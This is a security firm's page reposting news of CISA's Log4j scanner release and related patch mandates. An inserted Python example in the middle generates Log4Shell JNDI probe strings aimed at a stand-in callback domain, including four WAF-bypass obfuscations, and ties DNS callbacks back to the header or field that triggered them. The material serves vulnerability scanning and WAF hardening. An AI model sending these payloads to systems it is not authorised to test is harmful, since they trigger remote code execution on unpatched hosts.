Privacy Ninja

        • DATA PROTECTION

        • CYBERSECURITY

        • Penetration Testing

          Secure your network against various threat points. VA starts at only S$1,000, while VAPT starts at S$4,000. With Price Beat Guarantee!

        • API Penetration Testing
        • Enhance your digital security posture with our approach that identifies and addresses vulnerabilities within your API framework, ensuring robust protection against cyber threats targeting your digital interfaces.

        • On-Prem & Cloud Network Penetration Testing
        • Boost your network’s resilience with our assessment that uncovers security gaps, so you can strengthen your defences against sophisticated cyber threats targeting your network

        • Web Penetration Testing
        • Fortify your web presence with our specialised web app penetration testing service, designed to uncover and address vulnerabilities, ensuring your website stands resilient against online threats

        • Mobile Penetration Testing
        • Strengthen your mobile ecosystem’s resilience with our in-depth penetration testing service. From applications to underlying systems, we meticulously probe for vulnerabilities

        • Cyber Hygiene Training
        • Empower your team with essential cybersecurity knowledge, covering the latest vulnerabilities, best practices, and proactive defence strategies

        • Thick Client Penetration Testing
        • Elevate your application’s security with our thorough thick client penetration testing service. From standalone desktop applications to complex client-server systems, we meticulously probe for vulnerabilities to fortify your software against potential cyber threats.

        • Source Code Review
        • Ensure the integrity and security of your codebase with our comprehensive service, meticulously analysing code quality, identifying vulnerabilities, and optimising performance for various types of applications, scripts, plugins, and more

        • Email Spoofing Prevention
        • Check if your organisation’s email is vulnerable to hackers and put a stop to it. Receive your free test today!

        • Email Phishing Excercise
        • Strengthen your defense against email threats via simulated attacks that test and educate your team on spotting malicious emails, reducing breach risks and boosting security.

        • Cyber Essentials Bundle
        • Equip your organisation with essential cyber protection through our packages, featuring quarterly breached accounts monitoring, email phishing campaigns, cyber hygiene training, and more. LAUNCHING SOON.

CISA Releases Apache Log4j Scanner to Find Vulnerable Apps

The Cybersecurity and Infrastructure Security Agency (CISA) has announced the release of a scanner for identifying web services impacted by two Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046.

“log4j-scanner is a project derived from other members of the open-source community by CISA’s Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities,” the cybersecurity agency explains.


This scanner builds on similar tools, including an automated scanning framework for the CVE-2021-44228 bug (dubbed Log4Shell) developed by cybersecurity company FullHunt.

The tool enables security teams to scan network hosts for Log4j RCE exposure and to spot web application firewall (WAF) bypasses that would let threat actors gain code execution within the organization's environment.

CISA highlights the following features on log4j-scanner’s project page:

  • Support for lists of URLs.
  • Fuzzing of more than 60 HTTP request headers (not only the 3-4 headers covered by previously seen tools).
  • Fuzzing for HTTP POST Data parameters.
  • Fuzzing for JSON data parameters.
  • Supports DNS callback for vulnerability discovery and validation.
  • WAF Bypass payloads.
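The feature list above describes what a Log4Shell scanner does only in outline. The following is an added example, not code from the log4j-scanner project or from CISA, showing the three mechanics in miniature: every probe carries a JNDI lookup whose hostname embeds a unique token, so a DNS callback can be traced back to the exact header or field that was logged; POST form and JSON fields are fuzzed alongside headers; and the payload variants are the lookup obfuscations that defeat WAF rules matching the literal string `${jndi:`. The header subset, the target URL `http://target.example/login`, the callback domain `cb.example.net`, the token format and the BIND-style query-log line format are all assumptions; nothing in the block sends traffic.

```python
"""Log4Shell probe generation, DNS-callback correlation and WAF-bypass check.
Added example (not log4j-scanner's code). Requests are built, never sent."""
import json
import re
import secrets
import urllib.parse
from dataclasses import dataclass
from typing import Callable, Dict, List, Optional, Tuple

# Illustrative subset of the 60+ headers a scanner fuzzes (assumed list, not
# the scanner's). Most of these are written to access or application logs.
FUZZ_HEADERS = [
    "User-Agent", "Referer", "X-Forwarded-For", "X-Forwarded-Host",
    "X-Api-Version", "Authorization", "Cookie", "Origin", "X-Real-IP",
    "True-Client-IP", "X-Client-IP", "Forwarded", "X-Originating-IP",
    "X-Wap-Profile", "Contact", "If-Modified-Since",
]

# Lookup obfuscations of the kind WAF-bypass lists carry. Log4j's nested
# substitution turns each one into ${jndi:ldap://HOST/a} before the JNDI
# lookup runs, but only the first contains the literal "${jndi:".
PAYLOAD_TEMPLATES = [
    "${{jndi:ldap://{host}/a}}",
    "${{${{::-j}}${{::-n}}${{::-d}}${{::-i}}:${{::-l}}dap://{host}/a}}",
    "${{${{lower:j}}ndi:${{lower:l}}dap://{host}/a}}",
    "${{${{env:NOTHING:-j}}ndi:ldap://{host}/a}}",
]

@dataclass
class Probe:
    location: str          # "header:<name>", "form:<field>" or "json:<field>"
    method: str
    url: str
    headers: Dict[str, str]
    body: str
    token: str

def build_probes(url: str, callback_domain: str, form_fields: List[str],
                 json_fields: List[str], token_fn: Optional[Callable[[], str]] = None
                 ) -> Tuple[List[Probe], Dict[str, Tuple[str, int]]]:
    """Return (probes, registry); registry maps token -> (location, template index)."""
    token_fn = token_fn or (lambda: secrets.token_hex(4))
    probes: List[Probe] = []
    registry: Dict[str, Tuple[str, int]] = {}

    def add(location, method, headers, body, tok, tidx):
        probes.append(Probe(location, method, url, headers, body, tok))
        registry[tok] = (location, tidx)

    for tidx, tmpl in enumerate(PAYLOAD_TEMPLATES):
        def payload():
            tok = token_fn()  # unique per probe: the callback names the injection point
            return tok, tmpl.format(host=f"{tok}.{callback_domain}")
        for h in FUZZ_HEADERS:
            tok, p = payload()
            add(f"header:{h}", "GET", {h: p}, "", tok, tidx)
        for f in form_fields:
            tok, p = payload()
            add(f"form:{f}", "POST", {"Content-Type": "application/x-www-form-urlencoded"},
                urllib.parse.urlencode({f: p}), tok, tidx)
        for f in json_fields:
            tok, p = payload()
            add(f"json:{f}", "POST", {"Content-Type": "application/json"},
                json.dumps({f: p}), tok, tidx)
    return probes, registry

# Assumed BIND-style query log line; other resolvers need a different pattern.
_QUERY_RE = re.compile(r"query:\s+(?P<name>\S+)\s+IN\s+")

def correlate(dns_log_lines: List[str], registry: Dict[str, Tuple[str, int]],
              callback_domain: str) -> Dict[str, Tuple[str, int]]:
    """Map DNS callbacks seen in the resolver log back to the probe that caused them."""
    hits: Dict[str, Tuple[str, int]] = {}
    suffix = "." + callback_domain.lower()
    for line in dns_log_lines:
        m = _QUERY_RE.search(line)
        if not m:
            continue
        name = m.group("name").rstrip(".").lower()
        if not name.endswith(suffix):
            continue
        tok = name[: -len(suffix)].split(".")[-1]  # label directly left of the callback domain
        if tok in registry:
            hits[tok] = registry[tok]
    return hits

# Resolves ${lower:x}, ${upper:x}, ${::-x} and ${env:UNSET:-x} the way Log4j's
# substitution does. Illustrative: Log4j has more lookups than handled here.
_SIMPLE_LOOKUP = re.compile(r"\$\{(lower|upper|::|env:\w+):?-?([^${}]*)\}")

def normalize_lookups(s: str, max_rounds: int = 10) -> str:
    def _sub(m):
        kind, val = m.group(1), m.group(2)
        if kind == "lower":
            return val.lower()
        if kind == "upper":
            return val.upper()
        return val  # ${::-x} and ${env:UNSET:-x} both evaluate to the default x
    for _ in range(max_rounds):
        new = _SIMPLE_LOOKUP.sub(_sub, s)
        if new == s:
            break
        s = new
    return s

def naive_waf_blocks(s: str) -> bool:
    return "${jndi:" in s.lower()          # the literal-match rule bypass lists defeat

def hardened_waf_blocks(s: str) -> bool:
    return naive_waf_blocks(normalize_lookups(s))  # match after resolving the lookups

if __name__ == "__main__":
    probes, registry = build_probes("http://target.example/login", "cb.example.net",
                                    form_fields=["username"], json_fields=["username"])
    print(f"{len(probes)} probes across {len(PAYLOAD_TEMPLATES)} payload variants")
    hit = probes[3]   # pretend this probe's lookup fired; constructed log lines, not real traffic
    log = [f"client 203.0.113.5#53211: query: {hit.token}.cb.example.net IN A + (198.51.100.2)",
           "client 203.0.113.5#53212: query: www.example.org IN A + (198.51.100.2)"]
    for tok, (loc, tidx) in correlate(log, registry, "cb.example.net").items():
        print(f"callback {tok}: injection point {loc}, payload variant {tidx}")
    for t in PAYLOAD_TEMPLATES:
        p = t.format(host="x.cb.example.net")
        print(f"naive={naive_waf_blocks(p)!s:5} hardened={hardened_waf_blocks(p)!s:5} {p}")
```

Two points of the design matter in practice. The token goes in the hostname rather than the path so that a plain DNS resolution, which happens before any LDAP connection and even when egress is otherwise blocked, is enough to confirm the lookup fired; and `correlate` keys on the label adjacent to the callback domain, so a hit names the exact header or field that reached a vulnerable logger instead of just the host. The `normalize_lookups` check is the defender's side of the "WAF bypass payloads" feature: a rule that matches only the literal `${jndi:` blocks one of the four variants, while matching after resolving the simple lookups blocks all of them.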

CISA’s Log4Shell response

This is just the latest step taken by CISA to help government and private organizations respond to ongoing attacks abusing these critical security flaws in Apache’s Log4j logging library.

The agency was also behind a joint advisory issued today by cybersecurity agencies worldwide and US federal agencies with mitigation guidance on addressing the CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105 Log4j vulnerabilities.

CISA is also spearheading a push to urgently patch devices vulnerable to Log4Shell, to block threat actors' attempts to exploit vulnerable systems and infect them with malware.


On Friday, CISA ordered Federal Civilian Executive Branch agencies to patch their systems against Log4Shell by December 23. The agency also recently added the flaw to its Known Exploited Vulnerabilities Catalog, which likewise requires federal agencies to take expedited action and mitigate this critical flaw by December 24.

As BleepingComputer reported, Log4Shell attacks have been orchestrated by financially motivated attackers deploying Monero miners, ransomware gangs, and even state-backed hackers.

We also have articles with more information on the Log4Shell vulnerability, a comprehensive list of vendor advisories and vulnerable products, and why you must upgrade to Log4j 2.17.0 as soon as possible.
